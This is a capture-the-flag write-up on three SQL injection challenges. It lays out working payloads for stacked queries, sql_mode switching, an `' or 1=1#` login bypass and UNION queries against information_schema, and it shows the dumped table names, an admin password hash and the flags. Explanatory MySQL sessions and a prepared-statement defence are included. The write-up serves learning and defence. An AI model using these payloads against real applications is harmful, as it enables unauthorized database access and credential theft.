1. [SUCTF 2019]EasySQL 1
Character (string) and numeric injection were both attempted without success.

Use Burp Suite Intruder for brute-forcing: load the SQL injection wordlist as a Simple list payload and fuzz the input (see: Intruder usage).

Manual testing shows that when a number is input, the page prints the query result through var_dump().

Many keywords, such as DELETE and UPDATE, are filtered; the response is "Too long", "Nonono.", or nothing at all.

The output looks like this:

```
Array ( [0] => 1 )
```
To sum up:
- String input: nothing is displayed, and keywords (flag, UPDATE, and, ...) are filtered.
- Numeric input: the query result is printed as an array.
- Input too long: a "Too long" error is reported.
Searching for write-ups, they say the original challenge leaked its source code, but this one doesn't?? Or I didn't find it.

Assume we already have the original SQL statement. 🐷

```php
$sql = "select ".$post['query']."||flag from Flag";
```
- Stacked injection

Stacked queries work. The related table Flag is found; the ctf keyword is filtered.

```sql
1;show databases;#
-- Array ( [0] => 1 ) Array ( [0] => ctf ) Array ( [0] => ctftraining ) Array ( [0] => information_schema ) Array ( [0] => mysql ) Array ( [0] => performance_schema ) Array ( [0] => test )
1;use ctftraining;show tables;#
-- Array ( [0] => 1 ) Array ( [0] => FLAG_TABLE ) Array ( [0] => news ) Array ( [0] => users )
1;use ctf;show tables;#
-- Array ( [0] => 1 ) Array ( [0] => Flag )
1;use ctf;show tables;select * from Flag #
-- Nonono.
```
Knowledge:

sql_mode

sql_mode controls how strictly MySQL validates data (strict versus non-strict modes) and is used to make data validation and migration between different databases work.

PIPES_AS_CONCAT (Why is there such a wonderful setting?)

Treats `||` as the string-concatenation operator instead of the OR operator, the same way Oracle does; it then behaves like the string-concatenation function CONCAT().
- Method 1

By default, MySQL treats the `||` symbol as OR.

The payload `*,1#` is equivalent to:

```php
$sql = "select *,1 || flag from Flag";
```

Since `*` is not filtered, this selects every column of the table (the flag itself) and then the value of `1||flag`, which is evaluated as `1 OR flag` and simply gives 1.

- Method 2

```sql
1;set sql_mode=pipes_as_concat;select 1
```

The resulting statement is:

```sql
select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag
```

This first queries 1, then switches `||` to string concatenation, so the last statement outputs the data column 1 concatenated with flag. (TODO: should test it.)
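To see both `||` behaviours side by side, here is an added MySQL session (example code, not part of the original write-up). It uses a constructed Flag table with a placeholder value and assumes a MySQL server whose default sql_mode does not include PIPES_AS_CONCAT; the first SELECT is the check a defender would run to confirm which mode a server is actually in.

```sql
-- Added example (not from the original write-up): how MySQL evaluates `||`
-- under the default sql_mode versus PIPES_AS_CONCAT.
-- The table and its contents are constructed for this demo.
CREATE TEMPORARY TABLE Flag (flag VARCHAR(64));
INSERT INTO Flag VALUES ('flag{demo-value}');   -- placeholder, not the challenge flag

-- Check what the session is running with: if PIPES_AS_CONCAT is absent
-- from this value, `||` is logical OR.
SELECT @@SESSION.sql_mode;

-- Default mode: `1||flag` is `1 OR flag`, which is true regardless of the
-- string, so the expression is just the integer 1.
SELECT 1||flag FROM Flag;          -- 1
-- With 0 on the left the string is coerced to a number (0, with a
-- "Truncated incorrect DOUBLE value" warning), so the result is 0.
SELECT 0||flag FROM Flag;          -- 0

-- Why the `*,1` payload works: `*` returns the column on its own, and
-- `1||flag` is only an extra column that evaluates to 1.
SELECT *,1||flag FROM Flag;        -- ('flag{demo-value}', 1)

-- Changing the session's sql_mode needs no privilege, which is why a stacked
-- query can flip it. Afterwards `||` concatenates exactly like CONCAT().
SET SESSION sql_mode = 'PIPES_AS_CONCAT';
SELECT 1||flag FROM Flag;          -- '1flag{demo-value}'
SELECT CONCAT(1, flag) FROM Flag;  -- '1flag{demo-value}' (same thing)

-- Put the session back to the server default.
SET SESSION sql_mode = DEFAULT;
```

Because SET SESSION sql_mode is unprivileged and per-connection, a server-side default without PIPES_AS_CONCAT does not protect an application that lets stacked queries through; the mitigation is to stop the stacking (one statement per call, no multi-statement support in the client API) rather than to rely on the mode.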
2. [Geek Challenge 2019]EasySQL 1

The SQL injection point is in the login query statement.

```sql
' or '1'='1
```

Error, not character-type:

```
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
```

```sql
' or 1=1 -- '
' or 1=1#
```

The difference between `#` and `--` is that `#` starts a comment immediately, while `--` requires a space after the second dash.

flag{6e0397f6-6059-41d8-b6c6-305094c1cc16}
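As an added example (not from the original write-up), the following MySQL session shows the comment rule just described, the effect of the `' or 1=1#` payload on a login query built by string concatenation, and the parameterized form that is not affected. The users table, its contents, and the shape of the login query (username='...' and password='...') are assumptions, since the challenge source is not shown.

```sql
-- Added example (not from the original write-up). Table and login query
-- shape are constructed/assumed for this demo.
CREATE TEMPORARY TABLE users (id INT, username VARCHAR(32), password VARCHAR(64));
INSERT INTO users VALUES (1, 'admin', 'constructed-secret');

-- Comment syntax: '#' starts a comment at once; '--' only when followed by
-- whitespace, otherwise it is two minus signs.
SELECT 1 # everything after the hash is ignored, including the ; below
;
SELECT 1 -- same with dash-dash-space
;
SELECT 1 --1;      -- no space: parsed as 1 - (-1), returns 2

-- Assumed vulnerable shape (string concatenation):
--   select * from users where username='<u>' and password='<p>'
-- With the write-up's payload as username the statement becomes:
SELECT * FROM users WHERE username='' or 1=1#' and password='anything'
;
-- returns every row: 1=1 is always true and '#' swallows the password check.

-- Hardened form: a server-side prepared statement. The same text is bound
-- as a value, so it is compared against the column, never parsed as SQL.
-- ('''' inside a literal is a single quote, so @u holds: ' or 1=1# )
PREPARE stmt FROM 'SELECT * FROM users WHERE username = ? AND password = ?';
SET @u = ''' or 1=1#';
SET @p = 'anything';
EXECUTE stmt USING @u, @p;   -- Empty set
DEALLOCATE PREPARE stmt;
```

The application-side equivalent is a client-library prepared statement (for example PDO or mysqli prepare/bind in PHP); the point is the same: user input travels as a parameter, not as part of the query text.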
3. [Geek Challenge 2019]LoveSQL 1 (unfinished)

Because the browser does not URL-encode the # symbol (it is treated as the fragment delimiter), it must be written as %23 instead.

Determine the echo point:

```
# determine the echo point
/check.php?username=1'union select 1,2,3%23&password=1

# list the tables in the current database
/check.php?username=1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
# geekuser,l0ve1ysq1

# columns of the geekuser table
/check.php?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
# id,username,password

# columns of the l0ve1ysq1 table
/check.php?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

# query the geekuser table data
/check.php?username=1'union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
# 1 admin59598f210812a58844a52fcf4e1714ba

# query the l0ve1ysq1 table data
/check.php?username=1'union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
# flag{9add47d1-8d6a-4b04-b78a-7143104192e6}
```
Query template

In SQL injection payloads, INFORMATION_SCHEMA often appears together with UNION.

INFORMATION_SCHEMA provides access to database metadata: information about the MySQL server such as database and table names, column data types, and access privileges.

Therefore, once a SQL injection vulnerability is confirmed, UNION statements can be used to query INFORMATION_SCHEMA and obtain further clues (all database names, table names, and so on) for the next injection step.

Query all tables in the current database:

```sql
select * from Product union select group_concat(table_name),2
from information_schema.tables where table_schema=database();
```

Query the columns of the User table:

```sql
select * from Product union select group_concat(column_name),2
from information_schema.columns where table_name='User';
```

Query the password of a user in the User table:

```sql
select * from Product union select password,2
from User where user_id = 1;
```
SQL injection exercises
- [SUCTF 2019]EasySQL 1
- BabySQL 1
- HardSQL 1
- FinalSQL 1

Reference
- SUCTF 2019 EasySQL